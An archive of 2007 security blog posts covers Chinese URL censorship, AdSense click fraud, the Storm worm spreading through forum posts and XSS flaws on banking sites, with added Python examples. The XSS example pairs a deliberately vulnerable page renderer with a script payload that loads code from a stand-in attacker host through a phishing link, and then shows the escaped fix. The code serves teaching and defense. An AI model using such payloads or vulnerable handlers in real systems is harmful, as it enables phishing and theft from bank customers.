Friday, March 02, 2007

Real Time Censored URL Check in China

While a real-time check of URL censorship in China was originally realized as a project by Jonathan Zittrain and Benjamin Edelman a couple of years ago, it's great to see someone continue what they started and come up with GreatFirewallofChina.org:

"Aim of this website is to be a watchdog and keep track of which and how many or how many times sites are censored. Help to keep the censorship transparent. Each blocked website will automatically be added to the great firewall on the homepage."

What you should keep in mind is that, despite the capability for URL checking, from a technical perspective the censorship in China is much more sophisticated. URLs themselves can be obfuscated, and proxies and many other alternatives such as Tor can be used, so what I have in mind is the dynamic scanning of page content for subversive keywords, and the same technique applied to SMS messages. A check that a host answers says nothing about whether individual pages on it are filtered on their content. For instance, according to GreatFirewallofChina, blogspot.com is not blocked in the country, which doesn't mean a Taiwan independence related blog's content wouldn't get filtered. Moreover, it's perhaps even more disturbing to see various search results from a Chinese user's perspective than to figure out only whether a URL is blocked or not. Here are two great screenshots confirming the twisted reality, and a recent summary of the situation in China.

It would be great to see how this project evolves and starts presenting its results by confirming whether or not a URL is blocked in each of the countries on the world's censorship map, or even better, starts feeding local search engines with possibly censored keywords, summarizing the results and emphasizing the big picture.

Thursday, March 01, 2007

AdSense Click Fraud Rates

Google's single most profitable revenue source, AdSense, has always been under fire for click fraud, and most importantly the company has been under public scrutiny to better communicate its efforts at fighting the problem. Third-party companies emerged and started filling the niche by coming up with click fraud analytics software, so that not only Google's major customers but even small to mid-size businesses could take advantage of an automated way to analyze click anomalies. But how prevalent is the problem really? Should the discussion always orbit around Google's efforts, or around its customers' vigilance and education in detecting click fraud, or should it shift to improving the communication between all participants, namely Google, its customers and the click auditing companies?

According to the most recent click fraud rate from Google, click fraud is less than 0.02% of all clicks (that is, clicks that slip past its automated filters and are later caught after advertisers request reviews). Danny Sullivan has an in-depth analysis of the topic, emphasizing the importance of detected click fraud rates:

"Finally, we have a click fraud rate from Google itself: less than 0.02 percent of all clicks slip past its filters and are caught after advertisers request reviews. That low figure is sure to bring out the critics who will disagree. Below, more about how Google comes up with the figure plus some click fraud fighting initiatives it plans to implement later this year. Why release this figure now, when many have wanted it for literally years?

"We've been working to be more transparent and informative on the issues related to click fraud. Recently, this metric has been something advertisers have specifically asked for and we agree that is useful in describing the scope of the problem. Further, it is something we measure and use to monitor the performance of our click fraud detection systems," said Shuman Ghosemajumder, business product manager for trust & safety at Google."

In July 2006 Google commissioned a third-party analysis of its efforts to fight click fraud that you will definitely find informative, and here's another piece of research taking the discussion beyond the typical botnets and human clickers perspective. There are also click fraud false positives to keep in mind, as shown in this analysis.
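To make the "click anomaly" and "false positive" points concrete, here is an added example (my own code, not the original post's, Google's, or any click-auditing vendor's) of the simplest detector such tools implement: a burst of clicks on one ad from one source inside a short window. The log format, field names, window and threshold are assumptions, and the sample log is constructed. It also shows the false positive the analysis above warns about: a corporate NAT gateway or proxy looks like a repeat clicker if you key on IP alone, and stops looking like one once you key on IP plus browser.

```python
# Added example, not code from the original post or from any click-auditing vendor.
# Log format, field names, window and threshold are assumptions.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ad-click log: timestamp, client IP, user agent, ad id.
# 203.0.113.5 hammers one ad from one browser; 198.51.100.7 shows five clicks
# from five different browsers in the same window, the signature of a shared IP.
SAMPLE_LOG = """\
2007-02-28T10:00:01 203.0.113.5 UA-A ad42
2007-02-28T10:00:03 203.0.113.5 UA-A ad42
2007-02-28T10:00:04 203.0.113.5 UA-A ad42
2007-02-28T10:00:06 203.0.113.5 UA-A ad42
2007-02-28T10:00:09 203.0.113.5 UA-A ad42
2007-02-28T10:00:02 198.51.100.7 UA-B ad42
2007-02-28T10:00:05 198.51.100.7 UA-C ad42
2007-02-28T10:00:07 198.51.100.7 UA-D ad42
2007-02-28T10:00:08 198.51.100.7 UA-E ad42
2007-02-28T10:00:10 198.51.100.7 UA-F ad42
2007-02-28T10:30:00 192.0.2.9 UA-G ad42
"""


def parse_clicks(text):
    """Parse log lines into (timestamp, ip, user_agent, ad_id) tuples."""
    clicks = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, ua, ad = line.split()
        clicks.append((datetime.fromisoformat(ts), ip, ua, ad))
    return clicks


def max_clicks_in_window(times, window):
    """Largest number of timestamps that fall inside any interval of length `window`."""
    times = sorted(times)
    start, best = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect(text, per_ua=False, window=timedelta(seconds=60), threshold=3):
    """Return {key: burst_size} for every key whose click burst exceeds `threshold`.

    key is (ip, ad_id) by default; with per_ua=True it is (ip, user_agent, ad_id),
    which separates one abusive browser from many users behind a shared address.
    """
    groups = defaultdict(list)
    for ts, ip, ua, ad in parse_clicks(text):
        key = (ip, ua, ad) if per_ua else (ip, ad)
        groups[key].append(ts)
    flagged = {}
    for key, times in groups.items():
        burst = max_clicks_in_window(times, window)
        if burst > threshold:
            flagged[key] = burst
    return flagged


if __name__ == "__main__":
    print("keyed on IP:       ", detect(SAMPLE_LOG))
    print("keyed on IP + UA:  ", detect(SAMPLE_LOG, per_ua=True))
```

Keyed on IP alone both addresses are flagged; keyed on IP plus user agent only 203.0.113.5 is. Real auditing tools add more signals (referrer, session cookie, conversion behaviour), but the trade-off is the same one the false-positive analysis above describes: every extra signal you require lowers the false-positive rate and gives a deliberate clicker one more field to vary.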

Stats courtesy of Clickfraudindex who by the way started blogging recently.

Wednesday, February 28, 2007

Social Engineering the Old Media

While the rule of thirds is partly in place, the floating fragrance bottle and his depressed look provide some clues. The story is very interesting, though, as it has happened before. As Tim Nudd comments on Adfreak:

"In Switzerland, it doesn’t take much to be in a Gucci ad campaign. You photograph yourself naked, add a perfume bottle and the Gucci logo, send it to a weekly paper, and have them bill Gucci directly for the $50,000. They’ll fall for it every time."

How could it have been prevented? By coordinating the campaign with local Gucci representatives, by ensuring payment is processed before the ad is featured, or, let's just say, by looking at his face to figure out he's anything but a professional model.

Storm Worm Switching Propagation Vectors

The storm started with mass mailings, then the malware switched to IM propagation, and now the infected PCs are further spreading it through blog and forum posts:

"But the twist comes when these people later post blogs or bulletin board notices. The software will insert into each of their postings a link to a malicious Web site, said Alperovitch, who rates the threat as "high." "We haven't seen the Web channel used before," he said. "In the past, we've seen malicious links distributed to people in a user's address book and made to look like it's an instant message coming from them."

The smart thing is that, compared to situations where malware authors have to figure out how to bypass a forum's CAPTCHA, or mass-spam and generate new blogs, in this case the (infected) end user is authenticating both himself and the malware: the link rides on a session the legitimate user has already logged into, so registration checks, CAPTCHAs and posting rights are all satisfied by the victim. Here are some malware stats on social networking sites worth going through as well.

UPDATE: Symantec has a nice analysis with some screenshots of this variant.
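Since the client side of this vector looks entirely legitimate to the forum, the place to catch it is the server side. The following is an added example of my own (not code from the original post, from Symantec or from McAfee) of the one signal that does survive: the same external link turning up in posts by many unrelated accounts. Post format, hostnames and the threshold are assumptions, and the posts are constructed.

```python
# Added example, not code from the original post or from any vendor named in it.
# Post format, hostnames and threshold are assumptions.
import re
from collections import defaultdict
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"')]+")

# Constructed sample of (author, post body) pairs. malicious.example stands in for
# the worm's landing page; forum.example is the forum's own host, whose links are
# expected to repeat and are therefore ignored.
SAMPLE_POSTS = [
    ("alice", "Thanks for the tip, that fixed it. http://malicious.example/greeting.html"),
    ("bob", "Has anyone tried the new firmware? http://malicious.example/greeting.html"),
    ("carol", "Agree with bob. http://malicious.example/greeting.html."),
    ("dave", "See the docs at http://forum.example/wiki/setup"),
    ("erin", "Same problem here http://forum.example/wiki/setup"),
    ("alice", "Also useful: http://forum.example/wiki/faq"),
]


def extract_urls(body):
    """Return the URLs in a post body, minus trailing sentence punctuation."""
    return [u.rstrip(".,;:)") for u in URL_RE.findall(body)]


def flag_injected_links(posts, min_authors=3, own_hosts=("forum.example",)):
    """Map each external URL to the sorted list of distinct authors who posted it,
    keeping only URLs shared by at least `min_authors` accounts.

    One account posting a link repeatedly is ordinary spam; the same link appearing
    under many accounts that have nothing else in common is what an injecting
    client produces, because each victim posts it exactly once under their own name.
    """
    authors = defaultdict(set)
    for author, body in posts:
        for url in extract_urls(body):
            if urlsplit(url).hostname in own_hosts:
                continue
            authors[url].add(author)
    return {url: sorted(a) for url, a in authors.items() if len(a) >= min_authors}


if __name__ == "__main__":
    for url, who in flag_injected_links(SAMPLE_POSTS).items():
        print(url, "posted by", ", ".join(who))
```

The threshold is the tunable part: set it per time window in production (three distinct authors in a week is unremarkable, three in ten minutes on a small board is not), and feed the flagged URL, rather than the accounts, into the blocklist, since the accounts belong to victims.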

Tuesday, February 27, 2007

Credit Card Data Cloning Tactic

First of all, she's too cute for anyone to have even the slightest suspicion, and to be honest the posers paying for their coffee with a credit card deserve it; it leaves them without the opportunity to leave any change, or at least that's what they thought.

XSS Vulnerabilities in E-banking Sites

The other day I came across this summary with direct examples of various XSS vulnerabilities in e-banking sites, and I wonder why the results still haven't gotten the necessary attention from the affected parties:

"First of all you should realize, that this is not the first time, that we are doing such a website. The last time we hit a vast number of sites, mostly German banks. We have shown, that those sites, that should be most secure are not! Many visitors saw the site and also the banks seemed quite upset, nevertheless they fixed the problems, that we pointed at. You can check out the archive at: [English version] and [German version]. This project has been done as a direct reaction to the poll done in Austria not long ago and which was reported at [this article] from Heise. For the English readers among you, this article basically says, that 9 of 10 people using online banking in Austria trust the security, that their banks offer."

The best phishing attack, at least from a technical perspective, is the one that uses a vulnerability in the targeted brand's own site to further improve its credibility: with a reflected XSS, the phishing content is injected into a page served from the bank's real hostname, so the address the victim checks is the genuine one. And believe it or not, certain phishing attacks actually load images directly from the targeted brand's site instead of coming up with the phish creative on their own.
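Here is an added example of my own (not code from the original post, from the summary it quotes, or from any of the banks listed there) of the bug class in question: a reflected XSS in a search page of the kind such summaries list, beside the hardened version. The hostname, parameter name, page layout and payload are constructed; the point is that the vulnerable handler turns a link the victim receives into script running on the bank's own origin, while HTML entity encoding of the echoed value turns the same link into harmless text.

```python
# Added example, not code from the original post or from any bank named in it.
# Hostname, parameter name, page layout and payload are constructed.
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

PAGE = "<html><body><h1>Results for: {query}</h1></body></html>"


def query_param(url, name="q"):
    """Pull one query-string parameter out of a URL, percent-decoded."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(url):
    """Echoes the untrusted parameter straight into HTML.

    The browser parses attacker-supplied markup as part of the bank's own page,
    so a script tag in the link runs with the bank's origin and its cookies.
    """
    return PAGE.format(query=query_param(url))


def render_hardened(url):
    """Same page, with the untrusted value entity-encoded for an HTML text context.

    quote=True also encodes " and ', which matters if the value is ever echoed
    inside an attribute; encoding for the context you emit into is the whole fix.
    """
    return PAGE.format(query=escape(query_param(url), quote=True))


# The link a victim would receive. The hostname is the bank's real one (placeholder
# here), the script is the attacker's; only the query string is under attacker control.
PAYLOAD = '<script src="https://attacker.example/p.js"></script>'
PHISH_URL = "https://bank.example/search?q=" + quote(PAYLOAD, safe="")


def contains_script(html_out):
    """Crude check used to compare the two renderers: is there a live script tag?"""
    return "<script" in html_out.lower()


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PHISH_URL))
    print("hardened:  ", render_hardened(PHISH_URL))
```

A legitimate search still works unchanged through the hardened renderer, which is why there is rarely an excuse for leaving a reflected parameter unencoded. Note also that nothing in the phishing link points at the attacker's domain except the script source buried in the query string, which is exactly what makes the "check the address bar" advice fail here.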